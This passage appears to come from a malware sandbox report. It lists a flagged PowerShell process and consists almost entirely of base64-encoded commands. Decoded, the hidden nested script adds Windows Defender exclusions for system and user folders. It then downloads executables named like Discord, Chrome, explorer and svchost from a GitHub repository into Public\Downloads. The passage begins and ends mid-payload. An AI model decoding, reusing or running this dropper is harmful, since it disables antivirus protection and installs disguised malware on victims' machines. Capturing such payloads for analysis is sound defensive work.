ARQBBAFkAZwBCAEIAQQBFAEkAQQBkAGcAQgBCAEEARQBjAEEAUgBRAEIAQgBBAEYAbwBBAFEAUQBCAEMAQQBIAG8AQQBRAFEAQgBHAEEASABjAEEAUQBRAEIAYQBBAEYARQBBAFEAZwBBADAAQQBFAEUAQQBTAEEAQgBCAEEARQBFAEEAWQBnAEIAQgBBAEUASQBBAGQAZwBCAEIAQQBFAGcAQQBTAFEAQgBCAEEARgBvAEEAVQBRAEIAQwBBAEgAawBBAFEAUQBCAEQAQQBEAFEAQQBRAFEAQgBhAEEARgBFAEEAUQBnAEEAMABBAEUARQBBAFIAdwBCAFYAQQBFAEUAQQBTAGcAQgAzAEEARQBFAEEAYwB3AEIAQgBBAEUARQBBAGIAdwBCAEIAQQBFAGsAQQBRAFEAQgBCAEEARwBjAEEAUQBRAEIARABBAEUARQBBAFEAUQBCAEoAQQBFAEUAQQBRAFEAQgB1AEEARQBFAEEAUgBRAEIATgBBAEUARQBBAFQAdwBCAG4AQQBFAEkAQQBZAHcAQgBCAEEARQBZAEEAVgBRAEIAQgBBAEcATQBBAGQAdwBCAEMAQQBHAHcAQQBRAFEAQgBJAEEARQBrAEEAUQBRAEIAagBBAEgAYwBBAFEAZwBCAGoAQQBFAEUAQQBSAGcAQgBCAEEARQBFAEEAWgBBAEIAUgBBAEUASQBBAGEAUQBCAEIAQQBFAGMAQQBkAHcAQgBCAEEARwBFAEEAVQBRAEIAQwBBAEcAbwBBAFEAUQBCAEcAQQBIAGMAQQBRAFEAQgBTAEEARQBFAEEAUQBnAEIAMgBBAEUARQBBAFMAQQBCAGoAQQBFAEUAQQBZAGcAQgBuAEEARQBJAEEAYwB3AEIAQgBBAEUAYwBBAE8AQQBCAEIAQQBGAGsAQQBVAFEAQgBDAEEARwBzAEEAUQBRAEIASQBBAEUAMABBAFEAUQBCAFkAQQBFAEUAQQBRAGcAQgA2AEEARQBFAEEAUwBBAEIAWgBBAEUARQBBAFcAUQBCADMAQQBFAEkAQQBiAHcAQgBCAEEARQBjAEEATwBBAEIAQgBBAEcATQBBAGQAdwBCAEMAQQBEAEEAQQBRAFEAQgBEAEEARABRAEEAUQBRAEIAYQBBAEYARQBBAFEAZwBBADAAQQBFAEUAQQBSAHcAQgBWAEEARQBFAEEAUwBnAEIAMwBBAEUARQBBAFMAdwBCAEIAQQBFAE0AQQBhAHcAQgBCAEEARQBNAEEAWgB3AEIAQgBBAEUAcwBBAFEAUQBCAEYAQQBHAHMAQQBRAFEAQgBpAEEARwBjAEEAUQBnAEEAeQBBAEUARQBBAFIAdwBBADQAQQBFAEUAQQBZAFEAQgAzAEEARQBJAEEAYgBBAEIAQgBBAEUATQBBAE0AQQBCAEIAQQBGAFkAQQBkAHcAQgBDAEEARwB3AEEAUQBRAEIASABBAEUAawBBAFEAUQBCAFYAQQBHAGMAQQBRAGcAQgBzAEEARQBFAEEAUwBBAEIARgBBAEUARQBBAFoAQQBCAFIAQQBFAEkAQQBiAEEAQgBCAEEARQBnAEEAVABRAEIAQgBBAEcAUQBBAFEAUQBCAEIAQQBHAGMAQQBRAFEAQgBEAEEARABBAEEAUQBRAEIAVwBBAEYARQBBAFEAZwBCADUAQQBFAEUAQQBSAHcAQgByAEEARQBFAEEAUwBRAEIAQgBBAEUARQBBAGEAdwBCAEIAQQBFAGcAQQBWAFEAQgBCAEEARwBNAEEAWgB3AEIAQwBBAEgATQBBAFEAUQBCAEUAQQBFAFUAQQBRAFEAQgBKAEEARQBFAEEAUQBRAEIAMABBAEUARQBBAFIAUQBBADQAQQBFAEUAQQBaAEEAQgBSAEEARQBJAEEATQBBAEIAQgBBAEUAVQBBAFcAUQBCAEIAQQBHAEUAQQBVAFEAQgBDAEEASABNAEEAUQBRAEIASABBAEYAVQBBAFEAUQBCAEoAQQBFAEUAQQBRAFEAQgByAEEARQBFAEEAUgB3AEIAMwBBAEUARQBBAFkAZwBCADMAQQBFAEkAQQBhAGcAQgBCAEEARQBjAEEAUgBRAEIAQgBBAEcAUQBBAFEAUQBCAEMAQQBIAEEAQQBRAFEAQgBIAEEARABnAEEAUQBRAEIAaQBBAEcAYwBBAFEAZwBCADYAQQBFAEUAQQBSAGcAQgB6AEEARQBFAEEAVABRAEIAQgBBAEUASQBBAFoAQQBCAEIAQQBFAEUAQQBiAHcAQgBCAEEARgBNAEEAVQBRAEIAQwBBAEgAVQBBAFEAUQBCAEkAQQBGAGsAQQBRAFEAQgBpAEEASABjAEEAUQBnAEIAeQBBAEUARQBBAFIAdwBCAFYAQQBFAEUAQQBUAEEAQgBSAEEARQBJAEEAVwBBAEIAQgBBAEUAYwBBAFYAUQBCAEIAQQBGAGsAQQBaAHcAQgBDAEEARgBNAEEAUQBRAEIASABBAEYAVQBBAFEAUQBCAGoAQQBGAEUAQQBRAGcAQQB4AEEARQBFAEEAUgB3AEIAVgBBAEUARQBBAFkAdwBCADMAQQBFAEkAQQBNAEEAQgBCAEEARQBNAEEAUQBRAEIAQgBBAEUAdwBBAFUAUQBCAEMAQQBGAFkAQQBRAFEAQgBJAEEARQBrAEEAUQBRAEIAaABBAEYARQBBAFEAUQBCAG4AQQBFAEUAQQBRAHcAQgBSAEEARQBFAEEAWgBBAEIAUgBBAEUASQBBAGUAUQBCAEIAQQBFAGMAQQBkAHcAQgBCAEEARQAwAEEAWgB3AEIAQgBBAEcAYwBBAFEAUQBCAEQAQQBEAEEAQQBRAFEAQgBVAEEASABjAEEAUQBnAEEAeABBAEUARQBBAFMAQQBCAFIAQQBFAEUAQQBVAGcAQgBuAEEARQBJAEEAYwBBAEIAQgBBAEUAYwBBAGQAdwBCAEIAQQBGAG8AQQBVAFEAQgBCAEEARwBjAEEAUQBRAEIARABBAEYARQBBAFEAUQBCAGkAQQBFAEUAQQBRAGcAQgAyAEEARQBFAEEAUgB3AEIATgBBAEUARQBBAFcAUQBCAFIAQQBFAEkAQQBNAEEAQgBCAEEARQBjAEEAYQB3AEIAQgBBAEcASQBBAGQAdwBCAEMAQQBIAFUAQQBRAFEAQgBJAEEARQAwAEEAUQBRAEIAWABBAEgAYwBBAFEAUQBCADQAQQBFAEUAQQBSAGcAQQB3AEEARQBFAEEAUQB3AEIAbgBBAEUASQBBAFMAZwBCAEIAQQBFAGMAQQBOAEEAQgBCAEEARwBRAEEAWgB3AEIAQwBBAEgAWQBBAFEAUQBCAEgAQQBIAE0AQQBRAFEAQgBhAEEARgBFAEEAUQBRAEIAMABBAEUARQBBAFIAZwBCAGoAQQBFAEUAQQBXAGcAQgBSAEEARQBJAEEAYQBRAEIAQgBBAEUAWQBBAFMAUQBCAEIAQQBGAG8AQQBVAFEAQgBDAEEASABnAEEAUQBRAEIASQBBAEYAVQBBAFEAUQBCAGEAQQBGAEUAQQBRAGcAQgA2AEEARQBFAEEAUwBBAEIAUgBBAEUARQBBAFMAUQBCAEIAQQBFAEUAQQBkAEEAQgBCAEEARQBZAEEAVgBRAEIAQgBBAEcATQBBAFoAdwBCAEMAQQBIAEEAQQBRAFEAQgBEAEEARQBFAEEAUQBRAEIASwBBAEUARQBBAFEAZwBBAHgAQQBFAEUAQQBTAEEAQgBKAEEARQBFAEEAWQBnAEIAQgBBAEUARQBBAGUAZwBCAEIAQQBFAE0AQQBRAFEAQgBCAEEARQB3AEEAVQBRAEIAQwBBAEYAQQBBAFEAUQBCAEkAQQBGAFUAQQBRAFEAQgBrAEEARQBFAEEAUQBnAEIASABBAEUARQBBAFIAdwBCAHIAQQBFAEUAQQBZAGcAQgBCAEEARQBJAEEAYgBBAEIAQgBBAEUATQBBAFEAUQBCAEIAQQBFAG8AQQBRAFEAQgBDAEEASABNAEEAUQBRAEIASABBAEQAZwBBAFEAUQBCAFoAQQBIAGMAQQBRAGcAQgBvAEEARQBFAEEAUwBBAEIAUgBBAEUARQBBAFkAUQBCAFIAQQBFAEkAQQBkAGcAQgBCAEEARQBjAEEATgBBAEIAQgBBAEcATQBBAGQAdwBCAEMAQQBHAEkAQQBRAFEAQgBFAEEARQBrAEEAUQBRAEIAWQBBAEYARQBBAFEAUQBCAEwAQQBFAEUAQQBSAFEAQgByAEEARQBFAEEAWQBnAEIAbgBBAEUASQBBAE0AZwBCAEIAQQBFAGMAQQBPAEEAQgBCAEEARwBFAEEAZAB3AEIAQwBBAEcAdwBBAFEAUQBCAEQAQQBEAEEAQQBRAFEAQgBXAEEASABjAEEAUQBnAEIAcwBBAEUARQBBAFIAdwBCAEoAQQBFAEUAQQBWAFEAQgBuAEEARQBJAEEAYgBBAEIAQgBBAEUAZwBBAFIAUQBCAEIAQQBHAFEAQQBVAFEAQgBDAEEARwB3AEEAUQBRAEIASQBBAEUAMABBAFEAUQBCAGsAQQBFAEUAQQBRAFEAQgBuAEEARQBFAEEAUQB3AEEAdwBBAEUARQBBAFYAZwBCAFIAQQBFAEkAQQBlAFEAQgBCAEEARQBjAEEAYQB3AEIAQgBBAEUAawBBAFEAUQBCAEIAQQBHAHMAQQBRAFEAQgBJAEEARgBVAEEAUQBRAEIAagBBAEcAYwBBAFEAZwBCAHoAQQBFAEUAQQBSAEEAQgBSAEEARQBFAEEAUwBRAEIAQgBBAEUARQBBAGQAQQBCAEIAQQBFAFUAQQBPAEEAQgBCAEEARwBRAEEAVQBRAEIAQwBBAEQAQQBBAFEAUQBCAEYAQQBGAGsAQQBRAFEAQgBoAEEARgBFAEEAUQBnAEIAegBBAEUARQBBAFIAdwBCAFYAQQBFAEUAQQBTAFEAQgBCAEEARQBFAEEAYQB3AEIAQgBBAEUAYwBBAGQAdwBCAEIAQQBHAEkAQQBkAHcAQgBDAEEARwBvAEEAUQBRAEIASABBAEUAVQBBAFEAUQBCAGsAQQBFAEUAQQBRAGcAQgB3AEEARQBFAEEAUgB3AEEANABBAEUARQBBAFkAZwBCAG4AQQBFAEkAQQBlAGcAQgBCAEEARQBZAEEAYwB3AEIAQgBBAEUAMABBAGQAdwBCAEMAQQBHAFEAQQBRAFEAQgBCAEEARwA4AEEAUQBRAEIARABBAEcAYwBBAFEAZwBCAHQAQQBFAEUAQQBSAHcAQQA0AEEARQBFAEEAWQB3AEIAbgBBAEUASQBBAGIAQQBCAEIAQQBFAGMAQQBSAFEAQgBCAEEARgBrAEEAZAB3AEIAQwBBAEcAOABBAFEAUQBCAEQAQQBFAEUAQQBRAFEAQgBMAEEARQBFAEEAUQBRAEIAcgBBAEUARQBBAFIAdwBCADMAQQBFAEUAQQBZAGcAQgAzAEEARQBJAEEAYQBnAEIAQgBBAEUAYwBBAFIAUQBCAEIAQQBHAFEAQQBRAFEAQgBDAEEASABBAEEAUQBRAEIASABBAEQAZwBBAFEAUQBCAGkAQQBHAGMAQQBRAFEAQgBuAEEARQBFAEEAUgB3AEIAcgBBAEUARQBBAFkAZwBCAG4AQQBFAEUAQQBaAHcAQgBCAEEARQBNAEEAVQBRAEIAQgBBAEcASQBBAFEAUQBCAEMAQQBIAFkAQQBRAFEAQgBIAEEARQAwAEEAUQBRAEIAWgBBAEYARQBBAFEAZwBBAHcAQQBFAEUAQQBSAHcAQgByAEEARQBFAEEAWQBnAEIAMwBBAEUASQBBAGQAUQBCAEIAQQBFAGcAQQBUAFEAQgBCAEEARQBzAEEAVQBRAEIAQgBBAEcAYwBBAFEAUQBCAEkAQQBIAE0AQQBRAFEAQgBEAEEARwBjAEEAUQBRAEIAbgBBAEUARQBBAFEAdwBCAEIAQQBFAEUAQQBTAFEAQgBCAEEARQBFAEEAWgB3AEIAQgBBAEUAWQBBAFQAUQBCAEIAQQBHAFEAQQBRAFEAQgBDAEEARwBnAEEAUQBRAEIASQBBAEUAawBBAFEAUQBCAGsAQQBFAEUAQQBRAFEAQgAwAEEARQBFAEEAUgBnAEIAQgBBAEUARQBBAFkAdwBCAG4AQQBFAEkAQQBkAGcAQgBCAEEARQBjAEEAVABRAEIAQgBBAEYAbwBBAFUAUQBCAEMAQQBIAG8AQQBRAFEAQgBJAEEARQAwAEEAUQBRAEIASgBBAEUARQBBAFEAUQBCADAAQQBFAEUAQQBSAFEAQgBaAEEARQBFAEEAWQBRAEIAUgBBAEUASQBBAGMAdwBCAEIAQQBFAGMAQQBWAFEAQgBCAEEARgBVAEEAUQBRAEIAQwBBAEcAZwBBAFEAUQBCAEkAQQBGAEUAQQBRAFEAQgBoAEEARQBFAEEAUQBRAEIAbgBBAEUARQBBAFEAdwBCAFIAQQBFAEUAQQBZAGcAQgBCAEEARQBJAEEAZABnAEIAQgBBAEUAYwBBAFQAUQBCAEIAQQBGAGsAQQBVAFEAQgBDAEEARABBAEEAUQBRAEIASABBAEcAcwBBAFEAUQBCAGkAQQBIAGMAQQBRAGcAQgAxAEEARQBFAEEAUQB3AEIAQgBBAEUARQBBAFQAQQBCAFIAQQBFAEkAQQBXAEEAQgBCAEEARQBjAEEAYQB3AEIAQgBBAEcASQBBAFoAdwBCAEMAQQBHAHMAQQBRAFEAQgBIAEEARABnAEEAUQBRAEIAawBBAEgAYwBBAFEAZwBCAFUAQQBFAEUAQQBTAEEAQgBSAEEARQBFAEEAWgBRAEIAUgBBAEUASQBBAGMAdwBCAEIAQQBFAGMAQQBWAFEAQgBCAEEARQBrAEEAUQBRAEIAQwBBAEUAawBBAFEAUQBCAEgAQQBHAHMAQQBRAFEAQgBhAEEARQBFAEEAUQBnAEIAcgBBAEUARQBBAFIAdwBCAFYAQQBFAEUAQQBZAGcAQgBuAEEARQBFAEEAWgB3AEIAQgBBAEUATQBBAE0AQQBCAEIAQQBGAFkAQQBkAHcAQgBDAEEARwBnAEEAUQBRAEIASABBAEcAcwBBAFEAUQBCAGsAQQBFAEUAQQBRAFEAQgBMAEEARQBFAEEAUwBBAEEAdwBBAEUARQBBAEkAZwBBAD0AIgAKAA==
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3964
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand cABvAHcAZQByAHMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAQgB5AHAAYQBzAHMAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuACAALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAiAGMAQQBCAHYAQQBIAGMAQQBaAFEAQgB5AEEASABNAEEAYQBBAEIAbABBAEcAdwBBAGIAQQBBAGcAQQBDADAAQQBWAHcAQgBwAEEARwA0AEEAWgBBAEIAdgBBAEgAYwBBAFUAdwBCADAAQQBIAGsAQQBiAEEAQgBsAEEAQwBBAEEAUwBBAEIAcABBAEcAUQBBAFoAQQBCAGwAQQBHADQAQQBJAEEAQQB0AEEARQBNAEEAYgB3AEIAdABBAEcAMABBAFkAUQBCAHUAQQBHAFEAQQBJAEEAQQBpAEEARQBFAEEAWgBBAEIAawBBAEMAMABBAFQAUQBCAHcAQQBGAEEAQQBjAGcAQgBsAEEARwBZAEEAWgBRAEIAeQBBAEcAVQBBAGIAZwBCAGoAQQBHAFUAQQBJAEEAQQB0AEEARQBVAEEAZQBBAEIAagBBAEcAdwBBAGQAUQBCAHoAQQBHAGsAQQBiAHcAQgB1AEEARgBBAEEAWQBRAEIAMABBAEcAZwBBAEkAQQBBAG4AQQBFAE0AQQBPAGcAQgBjAEEARgBBAEEAYwBnAEIAdgBBAEcAYwBBAGMAZwBCAGgAQQBHADAAQQBSAEEAQgBoAEEASABRAEEAWQBRAEEAbgBBAEMASQBBAEMAZwBCAHcAQQBHADgAQQBkAHcAQgBsAEEASABJAEEAYwB3AEIAbwBBAEcAVQBBAGIAQQBCAHMAQQBDAEEAQQBMAFEAQgBYAEEARwBrAEEAYgBnAEIAawBBAEcAOABBAGQAdwBCAFQAQQBIAFEAQQBlAFEAQgBzAEEARwBVAEEASQBBAEIASQBBAEcAawBBAFoAQQBCAGsAQQBHAFUAQQBiAGcAQQBnAEEAQwAwAEEAUQB3AEIAdgBBAEcAMABBAGIAUQBCAGgAQQBHADQAQQBaAEEAQQBnAEEAQwBJAEEAUQBRAEIAawBBAEcAUQBBAEwAUQBCAE4AQQBIAEEAQQBVAEEAQgB5AEEARwBVAEEAWgBnAEIAbABBAEgASQBBAFoAUQBCAHUAQQBHAE0AQQBaAFEAQQBnAEEAQwAwAEEAUgBRAEIANABBAEcATQBBAGIAQQBCADEAQQBIAE0AQQBhAFEAQgB2AEEARwA0AEEAVQBBAEIAaABBAEgAUQBBAGEAQQBBAGcAQQBDAGMAQQBRAHcAQQA2AEEARgB3AEEAVgBRAEIAegBBAEcAVQBBAGMAZwBCAHoAQQBGAHcAQQBVAEEAQgAxAEEARwBJAEEAYgBBAEIAcABBAEcATQBBAFgAQQBCAEUAQQBHADgAQQBkAHcAQgB1AEEARwB3AEEAYgB3AEIAaABBAEcAUQBBAGMAdwBBAG4AQQBDAEkAQQBDAGcAQgB3AEEARwA4AEEAZAB3AEIAbABBAEgASQBBAGMAdwBCAG8AQQBHAFUAQQBiAEEAQgBzAEEAQwBBAEEATABRAEIAWABBAEcAawBBAGIAZwBCAGsAQQBHADgAQQBkAHcAQgBUAEEASABRAEEAZQBRAEIAcwBBAEcAVQBBAEkAQQBCAEkAQQBHAGsAQQBaAEEAQgBrAEEARwBVAEEAYgBnAEEAZwBBAEMAMABBAFEAdwBCAHYAQQBHADAAQQBiAFEAQgBoAEEARwA0AEEAWgBBAEEAZwBBAEMASQBBAFEAUQBCAGsAQQBHAFEAQQBMAFEAQgBOAEEASABBAEEAVQBBAEIAeQBBAEcAVQBBAFoAZwBCAGwAQQBIAEkAQQBaAFEAQgB1AEEARwBNAEEAWgBRAEEAZwBBAEMAMABBAFIAUQBCADQAQQBHAE0AQQBiAEEAQgAxAEEASABNAEEAYQBRAEIAdgBBAEcANABBAFUAQQBCAGgAQQBIAFEAQQBhAEEAQQBnAEEAQwBjAEEAUQB3AEEANgBBAEYAdwBBAFYAdwBCAHAAQQBHADQAQQBaAEEAQgB2AEEASABjAEEAYwB3AEIAYwBBAEYATQBBAGUAUQBCAHoAQQBIAFEAQQBaAFEAQgB0AEEARABNAEEATQBnAEEAbgBBAEMASQBBAEMAZwBCAHcAQQBHADgAQQBkAHcAQgBsAEEASABJAEEAYwB3AEIAbwBBAEcAVQBBAGIAQQBCAHMAQQBDAEEAQQBMAFEAQgBYAEEARwBrAEEAYgBnAEIAawBBAEcAOABBAGQAdwBCAFQAQQBIAFEAQQBlAFEAQgBzAEEARwBVAEEASQBBAEIASQBBAEcAawBBAFoAQQBCAGsAQQBHAFUAQQBiAGcAQQBnAEEAQwAwAEEAUQB3AEIAdgBBAEcAMABBAGIAUQBCAGgAQQBHADQAQQBaAEEAQQBnAEEAQwBJAEEAUQBRAEIAawBBAEcAUQBBAEwAUQBCAE4AQQBIAEEAQQBVAEEAQgB5AEEARwBVAEEAWgBnAEIAbABBAEgASQBBAFoAUQBCAHUAQQBHAE0AQQBaAFEAQQBnAEEAQwAwAEEAUgBRAEIANABBAEcATQBBAGIAQQBCADEAQQBIAE0AQQBhAFEAQgB2AEEARwA0AEEAVQBBAEIAaABBAEgAUQBBAGEAQQBBAGcAQQBDAGMAQQBRAHcAQQA2AEEARgB3AEEAVgB3AEIAcABBAEcANABBAFoAQQBCAHYAQQBIAGMAQQBjAHcAQgBjAEEARgBNAEEAZQBRAEIAegBBAEYAYwBBAFQAdwBCAFgAQQBEAFkAQQBOAEEAQQBuAEEAQwBJAEEAQwBnAEIAdwBBAEcAOABBAGQAdwBCAGwAQQBIAEkAQQBjAHcAQgBvAEEARwBVAEEAYgBBAEIAcwBBAEMAQQBBAEwAUQBCAFgAQQBHAGsAQQBiAGcAQgBrAEEARwA4AEEAZAB3AEIAVABBAEgAUQBBAGUAUQBCAHMAQQBHAFUAQQBJAEEAQgBJAEEARwBrAEEAWgBBAEIAawBBAEcAVQBBAGIAZwBBAGcAQQBDADAAQQBRAHcAQgB2AEEARwAwAEEAYgBRAEIAaABBAEcANABBAFoAQQBBAGcAQQBDAEkAQQBRAFEAQgBrAEEARwBRAEEATABRAEIATgBBAEgAQQBBAFUAQQBCAHkAQQBHAFUAQQBaAGcAQgBsAEEASABJAEEAWgBRAEIAdQBBAEcATQBBAFoAUQBBAGcAQQBDADAAQQBSAFEAQgA0AEEARwBNAEEAYgBBAEIAMQBBAEgATQBBAGEAUQBCAHYAQQBHADQAQQBVAEEAQgBoAEEASABRAEEAYQBBAEEAZwBBAEMAYwBBAFEAdwBBADYAQQBGAHcAQQBWAHcAQgBwAEEARwA0AEEAWgBBAEIAdgBBAEgAYwBBAGMAdwBBAG4AQQBDAEkAQQBDAGcAQQBLAEEAQwBRAEEAZABRAEIAeQBBAEcAdwBBAE0AUQBBAGcAQQBEADAAQQBJAEEAQQBuAEEARwBnAEEAZABBAEIAMABBAEgAQQBBAGMAdwBBADYAQQBDADgAQQBMAHcAQgBuAEEARwBrAEEAZABBAEIAbwBBAEgAVQBBAFkAZwBBAHUAQQBHAE0AQQBiAHcAQgB0AEEAQwA4AEEAUQBRAEIAdABBAEcAbwBBAFkAUQBCAGsAQQBFAEkAQQBZAFEAQgBzAEEARwB3AEEAYwB3AEEAdgBBAEYAUQBBAFIAUQBCAFQAQQBGAFEAQQBMAHcAQgB5AEEARwBFAEEAZAB3AEEAdgBBAEgASQBBAFoAUQBCAG0AQQBIAE0AQQBMAHcAQgBvAEEARwBVAEEAWQBRAEIAawBBAEgATQBBAEwAdwBCAHQAQQBHAEUAQQBhAFEAQgB1AEEAQwA4AEEAUgBBAEIAcABBAEgATQBBAFkAdwBCAHYAQQBIAEkAQQBaAEEAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEMAZwBBAGsAQQBIAFUAQQBjAGcAQgBzAEEARABJAEEASQBBAEEAOQBBAEMAQQBBAEoAdwBCAG8AQQBIAFEAQQBkAEEAQgB3AEEASABNAEEATwBnAEEAdgBBAEMAOABBAFoAdwBCAHAAQQBIAFEAQQBhAEEAQgAxAEEARwBJAEEATABnAEIAagBBAEcAOABBAGIAUQBBAHYAQQBFAEUAQQBiAFEAQgBxAEEARwBFAEEAWgBBAEIAQwBBAEcARQBBAGIAQQBCAHMAQQBIAE0AQQBMAHcAQgBVAEEARQBVAEEAVQB3AEIAVQBBAEMAOABBAGMAZwBCAGgAQQBIAGMAQQBMAHcAQgB5AEEARwBVAEEAWgBnAEIAegBBAEMAOABBAGEAQQBCAGwAQQBHAEUAQQBaAEEAQgB6AEEAQwA4AEEAYgBRAEIAaABBAEcAawBBAGIAZwBBAHYAQQBFAGMAQQBiAHcAQgB2AEEARwBjAEEAYgBBAEIAbABBAEUATQBBAGEAQQBCAHkAQQBHADgAQQBiAFEAQgBsAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBAEsAQQBDAFEAQQBkAFEAQgB5AEEARwB3AEEATQB3AEEAZwBBAEQAMABBAEkAQQBBAG4AQQBHAGcAQQBkAEEAQgAwAEEASABBAEEAYwB3AEEANgBBAEMAOABBAEwAdwBCAG4AQQBHAGsAQQBkAEEAQgBvAEEASABVAEEAWQBnAEEAdQBBAEcATQBBAGIAdwBCAHQAQQBDADgAQQBRAFEAQgB0AEEARwBvAEEAWQBRAEIAawBBAEUASQBBAFkAUQBCAHMAQQBHAHcAQQBjAHcAQQB2AEEARgBRAEEAUgBRAEIAVABBAEYAUQBBAEwAdwBCAHkAQQBHAEUAQQBkAHcAQQB2AEEASABJAEEAWgBRAEIAbQBBAEgATQBBAEwAdwBCAG8AQQBHAFUAQQBZAFEAQgBrAEEASABNAEEATAB3AEIAdABBAEcARQBBAGEAUQBCAHUAQQBDADgAQQBaAFEAQgA0AEEASABBAEEAYgBBAEIAdgBBAEgASQBBAFoAUQBCAHkAQQBDADQAQQBaAFEAQgA0AEEARwBVAEEASgB3AEEASwBBAEMAUQBBAGQAUQBCAHkAQQBHAHcAQQBOAEEAQQBnAEEARAAwAEEASQBBAEEAbgBBAEcAZwBBAGQAQQBCADAAQQBIAEEAQQBjAHcAQQA2AEEAQwA4AEEATAB3AEIAbgBBAEcAawBBAGQAQQBCAG8AQQBIAFUAQQBZAGcAQQB1AEEARwBNAEEAYgB3AEIAdABBAEMAOABBAFEAUQBCAHQAQQBHAG8AQQBZAFEAQgBrAEEARQBJAEEAWQBRAEIAcwBBAEcAdwBBAGMAdwBBAHYAQQBGAFEAQQBSAFEAQgBUAEEARgBRAEEATAB3AEIAeQBBAEcARQBBAGQAdwBBAHYAQQBIAEkAQQBaAFEAQgBtAEEASABNAEEATAB3AEIAbwBBAEcAVQBBAFkAUQBCAGsAQQBIAE0AQQBMAHcAQgB0AEEARwBFAEEAYQBRAEIAdQBBAEMAOABBAGMAdwBCADIAQQBHAE0AQQBhAEEAQgB2AEEASABNAEEAZABBAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBDAGcAQQBLAEEAQwBRAEEAYgBBAEIAdgBBAEcATQBBAFkAUQBCADAAQQBHAGsAQQBiAHcAQgB1AEEASABNAEEASQBBAEEAOQBBAEMAQQBBAFEAQQBBAG8AQQBBAG8AQQBJAEEAQQBnAEEAQwBBAEEASQBBAEEAbgBBAEUATQBBAE8AZwBCAGMAQQBGAFUAQQBjAHcAQgBsAEEASABJAEEAYwB3AEIAYwBBAEYAQQBBAGQAUQBCAGkAQQBHAHcAQQBhAFEAQgBqAEEARgB3AEEAUgBBAEIAdgBBAEgAYwBBAGIAZwBCAHMAQQBHADgAQQBZAFEAQgBrAEEASABNAEEAWABBAEIARQBBAEcAawBBAGMAdwBCAGoAQQBHADgAQQBjAGcAQgBrAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBAHMAQQBBAG8AQQBJAEEAQQBnAEEAQwBBAEEASQBBAEEAbgBBAEUATQBBAE8AZwBCAGMAQQBGAFUAQQBjAHcAQgBsAEEASABJAEEAYwB3AEIAYwBBAEYAQQBBAGQAUQBCAGkAQQBHAHcAQQBhAFEAQgBqAEEARgB3AEEAUgBBAEIAdgBBAEgAYwBBAGIAZwBCAHMAQQBHADgAQQBZAFEAQgBrAEEASABNAEEAWABBAEIASABBAEcAOABBAGIAdwBCAG4AQQBHAHcAQQBaAFEAQgBEAEEARwBnAEEAYwBnAEIAdgBBAEcAMABBAFoAUQBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEATABBAEEASwBBAEMAQQBBAEkAQQBBAGcAQQBDAEEAQQBKAHcAQgBEAEEARABvAEEAWABBAEIAVgBBAEgATQBBAFoAUQBCAHkAQQBIAE0AQQBYAEEAQgBRAEEASABVAEEAWQBnAEIAcwBBAEcAawBBAFkAdwBCAGMAQQBFAFEAQQBiAHcAQgAzAEEARwA0AEEAYgBBAEIAdgBBAEcARQBBAFoAQQBCAHoAQQBGAHcAQQBaAFEAQgA0AEEASABBAEEAYgBBAEIAdgBBAEgASQBBAFoAUQBCAHkAQQBDADQAQQBaAFEAQgA0AEEARwBVAEEASgB3AEEAcwBBAEEAbwBBAEkAQQBBAGcAQQBDAEEAQQBJAEEAQQBuAEEARQBNAEEATwBnAEIAYwBBAEYAVQBBAGMAdwBCAGwAQQBIAEkAQQBjAHcAQgBjAEEARgBBAEEAZABRAEIAaQBBAEcAdwBBAGEAUQBCAGoAQQBGAHcAQQBSAEEAQgB2AEEASABjAEEAYgBnAEIAcwBBAEcAOABBAFkAUQBCAGsAQQBIAE0AQQBYAEEAQgB6AEEASABZAEEAWQB3AEIAbwBBAEcAOABBAGMAdwBCADAAQQBDADQAQQBaAFEAQgA0AEEARwBVAEEASgB3AEEASwBBAEMAawBBAEMAZwBBAEsAQQBFAGsAQQBiAGcAQgAyAEEARwA4AEEAYQB3AEIAbABBAEMAMABBAFYAdwBCAGwAQQBHAEkAQQBVAGcAQgBsAEEASABFAEEAZABRAEIAbABBAEgATQBBAGQAQQBBAGcAQQBDADAAQQBWAFEAQgB5AEEARwBrAEEASQBBAEEAawBBAEgAVQBBAGMAZwBCAHMAQQBEAEUAQQBJAEEAQQB0AEEARQA4AEEAZABRAEIAMABBAEUAWQBBAGEAUQBCAHMAQQBHAFUAQQBJAEEAQQBrAEEARwB3AEEAYgB3AEIAagBBAEcARQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgBzAEEATQBBAEIAZABBAEEAbwBBAFMAUQBCAHUAQQBIAFkAQQBiAHcAQgByAEEARwBVAEEATABRAEIAWABBAEcAVQBBAFkAZwBCAFMAQQBHAFUAQQBjAFEAQgAxAEEARwBVAEEAYwB3AEIAMABBAEMAQQBBAEwAUQBCAFYAQQBIAEkAQQBhAFEAQQBnAEEAQwBRAEEAZABRAEIAeQBBAEcAdwBBAE0AZwBBAGcAQQBDADAAQQBUAHcAQgAxAEEASABRAEEAUgBnAEIAcABBAEcAdwBBAFoAUQBBAGcAQQBDAFEAQQBiAEEAQgB2AEEARwBNAEEAWQBRAEIAMABBAEcAawBBAGIAdwBCAHUAQQBIAE0AQQBXAHcAQQB4AEEARgAwAEEAQwBnAEIASgBBAEcANABBAGQAZwBCAHYAQQBHAHMAQQBaAFEAQQB0AEEARgBjAEEAWgBRAEIAaQBBAEYASQBBAFoAUQBCAHgAQQBIAFUAQQBaAFEAQgB6AEEASABRAEEASQBBAEEAdABBAEYAVQBBAGMAZwBCAHAAQQBDAEEAQQBKAEEAQgAxAEEASABJAEEAYgBBAEEAegBBAEMAQQBBAEwAUQBCAFAAQQBIAFUAQQBkAEEAQgB